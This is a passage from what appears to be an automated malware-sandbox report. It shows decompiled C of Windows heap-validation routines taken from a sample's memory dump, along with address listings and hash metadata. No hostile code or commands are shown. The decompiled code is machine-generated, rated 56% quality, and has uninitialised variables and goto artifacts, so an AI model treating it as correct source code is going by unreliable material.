							_t322 = _t385;
							goto L34;
						}
					}
					if(_a20 == 0) {
						L18:
						if(( *(_t415 + 2) & 0x00000004) == 0) {
							goto L67;
						}
						if(E011123E3(_t414, _t415) == 0) {
							goto L117;
						}
						goto L67;
					} else {
						if((_t390 & 0x00000002) == 0) {
							_t326 =  *(_t415 + 3) & 0x000000ff;
						} else {
							_t328 = E01061F5B(_t415);
							_t342 = _v20;
							_t326 =  *(_t328 + 2) & 0x0000ffff;
						}
						_t429 = _t326;
						if(_t429 == 0) {
							goto L18;
						}
						if(_t429 >= 0) {
							__eflags = _t326 & 0x00000800;
							if(__eflags != 0) {
								goto L18;
							}
							__eflags = _t326 -  *((intOrPtr*)(_t414 + 0x84));
							if(__eflags >= 0) {
								goto L18;
							}
							_t412 = _a20;
							_t327 = _t326 & 0x0000ffff;
							L17:
							 *((intOrPtr*)(_t412 + _t327 * 4)) =  *((intOrPtr*)(_t412 + _t327 * 4)) + _t342;
							goto L18;
						}
						_t327 = _t326 & 0x00007fff;
						if(_t327 >= 0x81) {
							goto L18;
						}
						_t412 = _a24;
						goto L17;
					}
					L86:
				} while (_t415 <  *((intOrPtr*)(_t332 + 0x28)));
				_t189 = _v12;
				goto L88;
			}



































































                                                                                                            0x01124af7
                                                                                                            0x01124afb
                                                                                                            0x01124afd
                                                                                                            0x01124b01
                                                                                                            0x01124b03
                                                                                                            0x01124b08
                                                                                                            0x01124b0a
                                                                                                            0x01124b0f
                                                                                                            0x01124eb5
                                                                                                            0x01124eb5
                                                                                                            0x01124ebb
                                                                                                            0x011250d5
                                                                                                            0x011250d8
                                                                                                            0x01124ff6
                                                                                                            0x00000000
                                                                                                            0x01124ff6
                                                                                                            0x011250de
                                                                                                            0x011250e4
                                                                                                            0x011250e8
                                                                                                            0x01125107
                                                                                                            0x0112510c
                                                                                                            0x011250ea
                                                                                                            0x011250ff
                                                                                                            0x01125104
                                                                                                            0x01125112
                                                                                                            0x01125115
                                                                                                            0x01125118
                                                                                                            0x01125119
                                                                                                            0x011250cb
                                                                                                            0x011250cb
                                                                                                            0x011250af
                                                                                                            0x00000000
                                                                                                            0x011250af
                                                                                                            0x01124ecb
                                                                                                            0x011250b6
                                                                                                            0x011250bb
                                                                                                            0x01124ed1
                                                                                                            0x01124ee6
                                                                                                            0x01124eeb
                                                                                                            0x011250c1
                                                                                                            0x011250c2
                                                                                                            0x011250c5
                                                                                                            0x011250c6
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x01124b15
                                                                                                            0x01124b15
                                                                                                            0x01124b1c
                                                                                                            0x01124b1e
                                                                                                            0x01124b23
                                                                                                            0x01124b27
                                                                                                            0x01124b33
                                                                                                            0x01124b38
                                                                                                            0x01124b3a
                                                                                                            0x01124b3c
                                                                                                            0x01124b41
                                                                                                            0x01124b41
                                                                                                            0x01124b3a
                                                                                                            0x01124b52
                                                                                                            0x01125045
                                                                                                            0x0112504b
                                                                                                            0x0112504f
                                                                                                            0x0112506e
                                                                                                            0x01125073
                                                                                                            0x01125051
                                                                                                            0x01125066
                                                                                                            0x0112506b
                                                                                                            0x01125083
                                                                                                            0x01125088
                                                                                                            0x01125088
                                                                                                            0x0112508a
                                                                                                            0x01125091
                                                                                                            0x01125099
                                                                                                            0x01125099
                                                                                                            0x0112509d
                                                                                                            0x011250a7
                                                                                                            0x011250ad
                                                                                                            0x011250ad
                                                                                                            0x011250ad
                                                                                                            0x00000000
                                                                                                            0x0112509d
                                                                                                            0x01124b58
                                                                                                            0x01124b5b
                                                                                                            0x01124b5e
                                                                                                            0x01124b63
                                                                                                            0x01124b66
                                                                                                            0x01124b69
                                                                                                            0x01124b6f
                                                                                                            0x01124be4
                                                                                                            0x01124bf0
                                                                                                            0x01124bf2
                                                                                                            0x01124bf5
                                                                                                            0x01124dc3
                                                                                                            0x01124dc6
                                                                                                            0x01124dc9
                                                                                                            0x01124dce
                                                                                                            0x01124dce
                                                                                                            0x01124dd0
                                                                                                            0x01124dd0
                                                                                                            0x01124dd5
                                                                                                            0x01124def
                                                                                                            0x01124dd7
                                                                                                            0x01124de7
                                                                                                            0x01124de7
                                                                                                            0x01124df3
                                                                                                            0x01125001
                                                                                                            0x01125007
                                                                                                            0x0112500b
                                                                                                            0x0112502a
                                                                                                            0x0112502f
                                                                                                            0x0112500d
                                                                                                            0x01125022
                                                                                                            0x01125027
                                                                                                            0x01125039
                                                                                                            0x0112503a
                                                                                                            0x0112503b
                                                                                                            0x00000000
                                                                                                            0x01124df9
                                                                                                            0x01124dfd
                                                                                                            0x01124e90
                                                                                                            0x01124e94
                                                                                                            0x01124e9e
                                                                                                            0x01124ea4
                                                                                                            0x01124ea4
                                                                                                            0x01124ea4
                                                                                                            0x01124ea6
                                                                                                            0x01124ea6
                                                                                                            0x00000000
                                                                                                            0x01124ea6
                                                                                                            0x01124e03
                                                                                                            0x01124e08
                                                                                                            0x01124f88
                                                                                                            0x01124f92
                                                                                                            0x01124f99
                                                                                                            0x01124f9c
                                                                                                            0x01124fe0
                                                                                                            0x01124fe4
                                                                                                            0x01124fee
                                                                                                            0x01124ff4
                                                                                                            0x01124ff4
                                                                                                            0x01124ff4
                                                                                                            0x00000000
                                                                                                            0x01124fe4
                                                                                                            0x01124f9e
                                                                                                            0x01124fa4
                                                                                                            0x01124fa8
                                                                                                            0x01124fc7
                                                                                                            0x01124fcc
                                                                                                            0x01124faa
                                                                                                            0x01124fbf
                                                                                                            0x01124fc4
                                                                                                            0x01124fd2
                                                                                                            0x01124fd5
                                                                                                            0x01124fd6
                                                                                                            0x01124f34
                                                                                                            0x01124f34
                                                                                                            0x00000000
                                                                                                            0x01124f39
                                                                                                            0x01124e0e
                                                                                                            0x01124e14
                                                                                                            0x01124e1b
                                                                                                            0x01124e25
                                                                                                            0x01124e2b
                                                                                                            0x01124e2b
                                                                                                            0x01124e33
                                                                                                            0x01124e38
                                                                                                            0x01124e8a
                                                                                                            0x01124e8a
                                                                                                            0x00000000
                                                                                                            0x01124e3a
                                                                                                            0x01124e3e
                                                                                                            0x01124e43
                                                                                                            0x01124e47
                                                                                                            0x01124e53
                                                                                                            0x01124e58
                                                                                                            0x01124e5a
                                                                                                            0x01124e5c
                                                                                                            0x01124e61
                                                                                                            0x01124e61
                                                                                                            0x01124e5a
                                                                                                            0x01124e6e
                                                                                                            0x01124f41
                                                                                                            0x01124f47
                                                                                                            0x01124f4b
                                                                                                            0x01124f6a
                                                                                                            0x01124f6f
                                                                                                            0x01124f4d
                                                                                                            0x01124f62
                                                                                                            0x01124f67
                                                                                                            0x01124f7f
                                                                                                            0x01124f80
                                                                                                            0x01124f81
                                                                                                            0x00000000
                                                                                                            0x01124e74
                                                                                                            0x01124e78
                                                                                                            0x01124e82
                                                                                                            0x01124e88
                                                                                                            0x01124e88
                                                                                                            0x00000000
                                                                                                            0x01124e78
                                                                                                            0x01124e6e
                                                                                                            0x01124e38
                                                                                                            0x01124df3
                                                                                                            0x01124bfe
                                                                                                            0x01124c01
                                                                                                            0x01124c04
                                                                                                            0x01124c07
                                                                                                            0x01124c09
                                                                                                            0x01124c0c
                                                                                                            0x01124c0e
                                                                                                            0x01124c0e
                                                                                                            0x01124c11
                                                                                                            0x01124c11
                                                                                                            0x01124c0c
                                                                                                            0x01124c14
                                                                                                            0x01124c17
                                                                                                            0x01124dae
                                                                                                            0x01124db2
                                                                                                            0x01124db7
                                                                                                            0x01124dba
                                                                                                            0x01124dbd
                                                                                                            0x01124ef1
                                                                                                            0x01124ef7
                                                                                                            0x01124efb
                                                                                                            0x01124f1a
                                                                                                            0x01124f1f
                                                                                                            0x01124efd
                                                                                                            0x01124f12
                                                                                                            0x01124f17
                                                                                                            0x01124f2b
                                                                                                            0x01124f2b
                                                                                                            0x01124f2d
                                                                                                            0x01124f2e
                                                                                                            0x01124f2f
                                                                                                            0x00000000
                                                                                                            0x01124f2f
                                                                                                            0x00000000
                                                                                                            0x01124c1d
                                                                                                            0x01124c1d
                                                                                                            0x01124c20
                                                                                                            0x01124c23
                                                                                                            0x01124c26
                                                                                                            0x01124c29
                                                                                                            0x01124c2c
                                                                                                            0x01124c2e
                                                                                                            0x01124d91
                                                                                                            0x01124d91
                                                                                                            0x01124d92
                                                                                                            0x01124d97
                                                                                                            0x01124d9e
                                                                                                            0x00000000
                                                                                                            0x01124d9e
                                                                                                            0x01124c34
                                                                                                            0x01124c37
                                                                                                            0x01124c39
                                                                                                            0x01124c3c
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x01124c45
                                                                                                            0x01124c48
                                                                                                            0x01124c4e
                                                                                                            0x01124c50
                                                                                                            0x01124c78
                                                                                                            0x01124c78
                                                                                                            0x01124c7b
                                                                                                            0x01124c7d
                                                                                                            0x01124c80
                                                                                                            0x01124c84
                                                                                                            0x01124cad
                                                                                                            0x01124cad
                                                                                                            0x01124cb0
                                                                                                            0x01124cb8
                                                                                                            0x01124cbb
                                                                                                            0x01124cbe
                                                                                                            0x01124cc1
                                                                                                            0x01124cc7
                                                                                                            0x01124cdc
                                                                                                            0x01124cc9
                                                                                                            0x01124cd2
                                                                                                            0x01124cd4
                                                                                                            0x01124cd4
                                                                                                            0x01124cde
                                                                                                            0x01124ce0
                                                                                                            0x01124d13
                                                                                                            0x01124d13
                                                                                                            0x01124d16
                                                                                                            0x01124d18
                                                                                                            0x01124d29
                                                                                                            0x01124d2a
                                                                                                            0x01124d2c
                                                                                                            0x01124d34
                                                                                                            0x01124d1a
                                                                                                            0x01124d1a
                                                                                                            0x01124d1a
                                                                                                            0x01124d1d
                                                                                                            0x01124d1f
                                                                                                            0x01124d22
                                                                                                            0x01124d24
                                                                                                            0x01124d24
                                                                                                            0x01124d3c
                                                                                                            0x01124d3f
                                                                                                            0x01124d45
                                                                                                            0x01124d47
                                                                                                            0x01124d6c
                                                                                                            0x01124d6c
                                                                                                            0x01124d70
                                                                                                            0x01124d7e
                                                                                                            0x01124d84
                                                                                                            0x01124d84
                                                                                                            0x00000000
                                                                                                            0x01124d49
                                                                                                            0x01124d49
                                                                                                            0x01124d56
                                                                                                            0x01124d56
                                                                                                            0x01124d59
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x01124d4e
                                                                                                            0x01124d50
                                                                                                            0x01124d52
                                                                                                            0x01124d8e
                                                                                                            0x01124d5d
                                                                                                            0x01124d5f
                                                                                                            0x01124d67
                                                                                                            0x00000000
                                                                                                            0x01124d67
                                                                                                            0x01124d54
                                                                                                            0x01124d54
                                                                                                            0x01124d5b
                                                                                                            0x00000000
                                                                                                            0x01124d5b
                                                                                                            0x01124ce2
                                                                                                            0x01124ce2
                                                                                                            0x01124ce5
                                                                                                            0x01124ce5
                                                                                                            0x01124ce7
                                                                                                            0x01124cfb
                                                                                                            0x01124ce9
                                                                                                            0x01124ce9
                                                                                                            0x01124cec
                                                                                                            0x01124cef
                                                                                                            0x01124cf1
                                                                                                            0x01124cf3
                                                                                                            0x01124cf3
                                                                                                            0x01124cf3
                                                                                                            0x01124cf6
                                                                                                            0x01124cf6
                                                                                                            0x01124d02
                                                                                                            0x01124d05
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x01124d07
                                                                                                            0x01124d0f
                                                                                                            0x01124d11
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x01124d11
                                                                                                            0x00000000
                                                                                                            0x01124ce5
                                                                                                            0x01124ce0
                                                                                                            0x01124c8a
                                                                                                            0x01124c8f
                                                                                                            0x01124c91
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x01124c9d
                                                                                                            0x00000000
                                                                                                            0x01124c9d
                                                                                                            0x01124c52
                                                                                                            0x01124c5f
                                                                                                            0x01124c5f
                                                                                                            0x01124c62
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x01124c57
                                                                                                            0x01124c59
                                                                                                            0x01124c5b
                                                                                                            0x01124caa
                                                                                                            0x01124c66
                                                                                                            0x01124c68
                                                                                                            0x01124c70
                                                                                                            0x01124c75
                                                                                                            0x00000000
                                                                                                            0x01124c75
                                                                                                            0x01124c5d
                                                                                                            0x01124c5d
                                                                                                            0x01124c64
                                                                                                            0x00000000
                                                                                                            0x01124c64
                                                                                                            0x01124c17
                                                                                                            0x01124b75
                                                                                                            0x01124bc4
                                                                                                            0x01124bc8
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x01124bd9
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x01124b77
                                                                                                            0x01124b7a
                                                                                                            0x01124b8c
                                                                                                            0x01124b7c
                                                                                                            0x01124b7e
                                                                                                            0x01124b83
                                                                                                            0x01124b86
                                                                                                            0x01124b86
                                                                                                            0x01124b90
                                                                                                            0x01124b93
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x01124b95
                                                                                                            0x01124bab
                                                                                                            0x01124bb0
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x01124bb2
                                                                                                            0x01124bb9
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x01124bbb
                                                                                                            0x01124bbe
                                                                                                            0x01124bc1
                                                                                                            0x01124bc1
                                                                                                            0x00000000
                                                                                                            0x01124bc1
                                                                                                            0x01124b97
                                                                                                            0x01124ba4
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x01124ba6
                                                                                                            0x00000000
                                                                                                            0x01124ba6
                                                                                                            0x01124ea9
                                                                                                            0x01124ea9
                                                                                                            0x01124eb2
                                                                                                            0x00000000

                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
                                                                                                            • API String ID: 0-3591852110
                                                                                                            • Opcode ID: b670a731c6fca260918bd7f4529cadc56b33a1dcf20302035cfc372cedf32a90
                                                                                                            • Instruction ID: 61966980badd7f1dc5a4ae7d639218df085b13ad9c129aad46b9eb86763825c6
                                                                                                            • Opcode Fuzzy Hash: b670a731c6fca260918bd7f4529cadc56b33a1dcf20302035cfc372cedf32a90
                                                                                                            • Instruction Fuzzy Hash: 1212DE70200662DFE72DCF2DC494BBABBE5FF48704F158459E5868BA41D738E8A0CB91
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 01124496 Relevance: 10.4, Strings: 8, Instructions: 417COMMONCrypto
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 56%
                                                                                                            			E01124496(signed int* __ecx, void* __edx) {
				signed int _v5;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed char _v24;
				signed int* _v28;
				char _v32;
				signed int* _v36;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t150;
				intOrPtr _t151;
				signed char _t156;
				intOrPtr _t157;
				unsigned int _t169;
				intOrPtr _t170;
				signed int* _t183;
				signed char _t184;
				intOrPtr _t191;
				signed int _t201;
				intOrPtr _t203;
				intOrPtr _t212;
				intOrPtr _t220;
				signed int _t230;
				signed int _t241;
				signed int _t244;
				void* _t259;
				signed int _t260;
				signed int* _t261;
				intOrPtr* _t262;
				signed int _t263;
				signed int* _t264;
				signed int _t267;
				signed int* _t268;
				void* _t270;
				void* _t281;
				signed short _t285;
				signed short _t289;
				signed int _t291;
				signed int _t298;
				signed char _t303;
				signed char _t308;
				signed int _t314;
				intOrPtr _t317;
				unsigned int _t319;
				signed int* _t325;
				signed int _t326;
				signed int _t327;
				intOrPtr _t328;
				signed int _t329;
				signed int _t330;
				signed int* _t331;
				signed int _t332;
				signed int _t350;

				_t259 = __edx;
				_t331 = __ecx;
				_v28 = __ecx;
				_v20 = 0;
				_v12 = 0;
				_t150 = E011249A4(__ecx);
				_t267 = 1;
				if(_t150 == 0) {
					L61:
					_t151 =  *[fs:0x30];
					__eflags =  *((char*)(_t151 + 2));
					if( *((char*)(_t151 + 2)) != 0) {
						 *0x1156378 = _t267;
						asm("int3");
						 *0x1156378 = 0;
					}
					__eflags = _v12;
					if(_v12 != 0) {
						_t105 =  &_v16;
						 *_t105 = _v16 & 0x00000000;
						__eflags =  *_t105;
						E0109174B( &_v12,  &_v16, 0x8000);
					}
					L65:
					__eflags = 0;
					return 0;
				}
				if(_t259 != 0 || (__ecx[0x10] & 0x20000000) != 0) {
					_t268 =  &(_t331[0x30]);
					_v32 = 0;
					_t260 =  *_t268;
					_t308 = 0;
					_v24 = 0;
					while(_t268 != _t260) {
						_t260 =  *_t260;
						_v16 =  *_t325 & 0x0000ffff;
						_t156 = _t325[0];
						_v28 = _t325;
						_v5 = _t156;
						__eflags = _t156 & 0x00000001;
						if((_t156 & 0x00000001) != 0) {
							_t157 =  *[fs:0x30];
							__eflags =  *(_t157 + 0xc);
							if( *(_t157 + 0xc) == 0) {
								_push("HEAP: ");
								E0106B150();
							} else {
								E0106B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push(_t325);
							E0106B150("dedicated (%04Ix) free list element %p is marked busy\n", _v16);
							L32:
							_t270 = 0;
							__eflags = _t331[0x13];
							if(_t331[0x13] != 0) {
								_t325[0] = _t325[0] ^ _t325[0] ^  *_t325;
								 *_t325 =  *_t325 ^ _t331[0x14];
							}
							L60:
							_t267 = _t270 + 1;
							__eflags = _t267;
							goto L61;
						}
						_t169 =  *_t325 & 0x0000ffff;
						__eflags = _t169 - _t308;
						if(_t169 < _t308) {
							_t170 =  *[fs:0x30];
							__eflags =  *(_t170 + 0xc);
							if( *(_t170 + 0xc) == 0) {
								_push("HEAP: ");
								E0106B150();
							} else {
								E0106B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							E0106B150("Non-Dedicated free list element %p is out of order\n", _t325);
							goto L32;
						} else {
							__eflags = _t331[0x13];
							_t308 = _t169;
							_v24 = _t308;
							if(_t331[0x13] != 0) {
								_t325[0] = _t169 >> 0x00000008 ^ _v5 ^ _t308;
								 *_t325 =  *_t325 ^ _t331[0x14];
								__eflags =  *_t325;
							}
							_t26 =  &_v32;
							 *_t26 = _v32 + 1;
							__eflags =  *_t26;
							continue;
						}
					}
					_v16 = 0x208 + (_t331[0x21] & 0x0000ffff) * 4;
					if( *0x1156350 != 0 && _t331[0x2f] != 0) {
						_push(4);
						_push(0x1000);
						_push( &_v16);
						_push(0);
						_push( &_v12);
						_push(0xffffffff);
						if(E010A9660() >= 0) {
							_v20 = _v12 + 0x204;
						}
					}
					_t183 =  &(_t331[0x27]);
					_t281 = 0x81;
					_t326 =  *_t183;
					if(_t183 == _t326) {
						L49:
						_t261 =  &(_t331[0x29]);
						_t184 = 0;
						_t327 =  *_t261;
						_t282 = 0;
						_v24 = 0;
						_v36 = 0;
						__eflags = _t327 - _t261;
						if(_t327 == _t261) {
							L53:
							_t328 = _v32;
							_v28 = _t331;
							__eflags = _t328 - _t184;
							if(_t328 == _t184) {
								__eflags = _t331[0x1d] - _t282;
								if(_t331[0x1d] == _t282) {
									__eflags = _v12;
									if(_v12 == 0) {
										L82:
										_t267 = 1;
										__eflags = 1;
										goto L83;
									}
									_t329 = _t331[0x2f];
									__eflags = _t329;
									if(_t329 == 0) {
										L77:
										_t330 = _t331[0x22];
										__eflags = _t330;
										if(_t330 == 0) {
											L81:
											_t129 =  &_v16;
											 *_t129 = _v16 & 0x00000000;
											__eflags =  *_t129;
											E0109174B( &_v12,  &_v16, 0x8000);
											goto L82;
										}
										_t314 = _t331[0x21] & 0x0000ffff;
										_t285 = 1;
										__eflags = 1 - _t314;
										if(1 >= _t314) {
											goto L81;
										} else {
											goto L79;
										}
										while(1) {
											L79:
											_t330 = _t330 + 0x40;
											_t332 = _t285 & 0x0000ffff;
											_t262 = _v20 + _t332 * 4;
											__eflags =  *_t262 -  *((intOrPtr*)(_t330 + 8));
											if( *_t262 !=  *((intOrPtr*)(_t330 + 8))) {
												break;
											}
											_t285 = _t285 + 1;
											__eflags = _t285 - _t314;
											if(_t285 < _t314) {
												continue;
											}
											goto L81;
										}
										_t191 =  *[fs:0x30];
										__eflags =  *(_t191 + 0xc);
										if( *(_t191 + 0xc) == 0) {
											_push("HEAP: ");
											E0106B150();
										} else {
											E0106B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
										}
										_push(_t262);
										_push( *((intOrPtr*)(_v20 + _t332 * 4)));
										_t148 = _t330 + 0x10; // 0x10
										_push( *((intOrPtr*)(_t330 + 8)));
										E0106B150("Tag %04x (%ws) size incorrect (%Ix != %Ix) %p\n", _t332);
										L59:
										_t270 = 0;
										__eflags = 0;
										goto L60;
									}
									_t289 = 1;
									__eflags = 1;
									while(1) {
										_t201 = _v12;
										_t329 = _t329 + 0xc;
										_t263 = _t289 & 0x0000ffff;
										__eflags =  *((intOrPtr*)(_t201 + _t263 * 4)) -  *((intOrPtr*)(_t329 + 8));
										if( *((intOrPtr*)(_t201 + _t263 * 4)) !=  *((intOrPtr*)(_t329 + 8))) {
											break;
										}
										_t289 = _t289 + 1;
										__eflags = _t289 - 0x81;
										if(_t289 < 0x81) {
											continue;
										}
										goto L77;
									}
									_t203 =  *[fs:0x30];
									__eflags =  *(_t203 + 0xc);
									if( *(_t203 + 0xc) == 0) {
										_push("HEAP: ");
										E0106B150();
									} else {
										E0106B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
									}
									_t291 = _v12;
									_push(_t291 + _t263 * 4);
									_push( *((intOrPtr*)(_t291 + _t263 * 4)));
									_push( *((intOrPtr*)(_t329 + 8)));
									E0106B150("Pseudo Tag %04x size incorrect (%Ix != %Ix) %p\n", _t263);
									goto L59;
								}
								_t212 =  *[fs:0x30];
								__eflags =  *(_t212 + 0xc);
								if( *(_t212 + 0xc) == 0) {
									_push("HEAP: ");
									E0106B150();
								} else {
									E0106B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push(_t331[0x1d]);
								_push(_v36);
								_push("Total size of free blocks in arena (%Id) does not match number total in heap header (%Id)\n");
								L58:
								E0106B150();
								goto L59;
							}
							_t220 =  *[fs:0x30];
							__eflags =  *(_t220 + 0xc);
							if( *(_t220 + 0xc) == 0) {
								_push("HEAP: ");
								E0106B150();
							} else {
								E0106B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push(_t328);
							_push(_v24);
							_push("Number of free blocks in arena (%ld) does not match number in the free lists (%ld)\n");
							goto L58;
						} else {
							goto L50;
						}
						while(1) {
							L50:
							_t92 = _t327 - 0x10; // -24
							_t282 = _t331;
							_t230 = E01124AEF(_t331, _t92, _t331,  &_v24,  &_v36,  &_v28, _v20, _v12);
							__eflags = _t230;
							if(_t230 == 0) {
								goto L59;
							}
							_t327 =  *_t327;
							__eflags = _t327 - _t261;
							if(_t327 != _t261) {
								continue;
							}
							_t184 = _v24;
							_t282 = _v36;
							goto L53;
						}
						goto L59;
					} else {
						while(1) {
							_t39 = _t326 + 0x18; // 0x10
							_t264 = _t39;
							if(_t331[0x13] != 0) {
								_t319 = _t331[0x14] ^  *_t264;
								 *_t264 = _t319;
								_t303 = _t319 >> 0x00000010 ^ _t319 >> 0x00000008 ^ _t319;
								_t348 = _t319 >> 0x18 - _t303;
								if(_t319 >> 0x18 != _t303) {
									_push(_t303);
									E0111FA2B(_t264, _t331, _t264, _t326, _t331, _t348);
								}
								_t281 = 0x81;
							}
							_t317 = _v20;
							if(_t317 != 0) {
								_t241 =  *(_t326 + 0xa) & 0x0000ffff;
								_t350 = _t241;
								if(_t350 != 0) {
									if(_t350 >= 0) {
										__eflags = _t241 & 0x00000800;
										if(__eflags == 0) {
											__eflags = _t241 - _t331[0x21];
											if(__eflags < 0) {
												_t298 = _t241;
												_t65 = _t317 + _t298 * 4;
												 *_t65 =  *(_t317 + _t298 * 4) + ( *(_t326 + 0x10) >> 3);
												__eflags =  *_t65;
											}
										}
									} else {
										_t244 = _t241 & 0x00007fff;
										if(_t244 < _t281) {
											 *((intOrPtr*)(_v12 + _t244 * 4)) =  *((intOrPtr*)(_v12 + _t244 * 4)) + ( *(_t326 + 0x10) >> 3);
										}
									}
								}
							}
							if(( *(_t326 + 0x1a) & 0x00000004) != 0 && E011123E3(_t331, _t264) == 0) {
								break;
							}
							if(_t331[0x13] != 0) {
								_t264[0] = _t264[0] ^ _t264[0] ^  *_t264;
								 *_t264 =  *_t264 ^ _t331[0x14];
							}
							_t326 =  *_t326;
							if( &(_t331[0x27]) == _t326) {
								goto L49;
							} else {
								_t281 = 0x81;
								continue;
							}
						}
						__eflags = _t331[0x13];
						if(_t331[0x13] != 0) {
							 *(_t326 + 0x1b) =  *(_t326 + 0x1a) ^  *(_t326 + 0x19) ^  *(_t326 + 0x18);
							 *(_t326 + 0x18) =  *(_t326 + 0x18) ^ _t331[0x14];
						}
						goto L65;
					}
				} else {
					L83:
					return _t267;
				}
			}



























































                                                                                                            0x011244a1
                                                                                                            0x011244a3
                                                                                                            0x011244a7
                                                                                                            0x011244ac
                                                                                                            0x011244af
                                                                                                            0x011244b2
                                                                                                            0x011244b9
                                                                                                            0x011244bc
                                                                                                            0x011247f2
                                                                                                            0x011247f2
                                                                                                            0x011247f8
                                                                                                            0x011247fc
                                                                                                            0x011247fe
                                                                                                            0x01124804
                                                                                                            0x01124805
                                                                                                            0x01124805
                                                                                                            0x0112480c
                                                                                                            0x01124810
                                                                                                            0x01124812
                                                                                                            0x01124812
                                                                                                            0x01124812
                                                                                                            0x01124822
                                                                                                            0x01124822
                                                                                                            0x01124827
                                                                                                            0x01124827
                                                                                                            0x00000000
                                                                                                            0x01124827
                                                                                                            0x011244c4
                                                                                                            0x011244d3
                                                                                                            0x011244d9
                                                                                                            0x011244dc
                                                                                                            0x011244de
                                                                                                            0x011244e0
                                                                                                            0x01124560
                                                                                                            0x01124520
                                                                                                            0x01124522
                                                                                                            0x01124525
                                                                                                            0x01124528
                                                                                                            0x0112452b
                                                                                                            0x0112452e
                                                                                                            0x01124530
                                                                                                            0x01124697
                                                                                                            0x0112469d
                                                                                                            0x011246a1
                                                                                                            0x011246c0
                                                                                                            0x011246c5
                                                                                                            0x011246a3
                                                                                                            0x011246b8
                                                                                                            0x011246bd
                                                                                                            0x011246cb
                                                                                                            0x011246d4
                                                                                                            0x01124677
                                                                                                            0x01124677
                                                                                                            0x01124679
                                                                                                            0x0112467c
                                                                                                            0x0112468a
                                                                                                            0x01124690
                                                                                                            0x01124690
                                                                                                            0x011247f1
                                                                                                            0x011247f1
                                                                                                            0x011247f1
                                                                                                            0x00000000
                                                                                                            0x011247f1
                                                                                                            0x01124536
                                                                                                            0x01124539
                                                                                                            0x0112453c
                                                                                                            0x01124636
                                                                                                            0x0112463c
                                                                                                            0x01124640
                                                                                                            0x0112465f
                                                                                                            0x01124664
                                                                                                            0x01124642
                                                                                                            0x01124657
                                                                                                            0x0112465c
                                                                                                            0x01124670
                                                                                                            0x00000000
                                                                                                            0x01124542
                                                                                                            0x01124542
                                                                                                            0x01124546
                                                                                                            0x01124548
                                                                                                            0x0112454b
                                                                                                            0x01124555
                                                                                                            0x0112455b
                                                                                                            0x0112455b
                                                                                                            0x0112455b
                                                                                                            0x0112455d
                                                                                                            0x0112455d
                                                                                                            0x0112455d
                                                                                                            0x00000000
                                                                                                            0x0112455d
                                                                                                            0x0112453c
                                                                                                            0x01124579
                                                                                                            0x0112457c
                                                                                                            0x01124587
                                                                                                            0x01124589
                                                                                                            0x01124591
                                                                                                            0x01124592
                                                                                                            0x01124597
                                                                                                            0x01124598
                                                                                                            0x011245a1
                                                                                                            0x011245ab
                                                                                                            0x011245ab
                                                                                                            0x011245a1
                                                                                                            0x011245ae
                                                                                                            0x011245b4
                                                                                                            0x011245b9
                                                                                                            0x011245bd
                                                                                                            0x01124759
                                                                                                            0x01124759
                                                                                                            0x0112475f
                                                                                                            0x01124761
                                                                                                            0x01124763
                                                                                                            0x01124765
                                                                                                            0x01124768
                                                                                                            0x0112476b
                                                                                                            0x0112476d
                                                                                                            0x0112479c
                                                                                                            0x0112479c
                                                                                                            0x0112479f
                                                                                                            0x011247a2
                                                                                                            0x011247a4
                                                                                                            0x01124830
                                                                                                            0x01124833
                                                                                                            0x01124879
                                                                                                            0x0112487d
                                                                                                            0x011248f1
                                                                                                            0x011248f3
                                                                                                            0x011248f3
                                                                                                            0x00000000
                                                                                                            0x011248f3
                                                                                                            0x0112487f
                                                                                                            0x01124885
                                                                                                            0x01124887
                                                                                                            0x011248a8
                                                                                                            0x011248a8
                                                                                                            0x011248ae
                                                                                                            0x011248b0
                                                                                                            0x011248dc
                                                                                                            0x011248dc
                                                                                                            0x011248dc
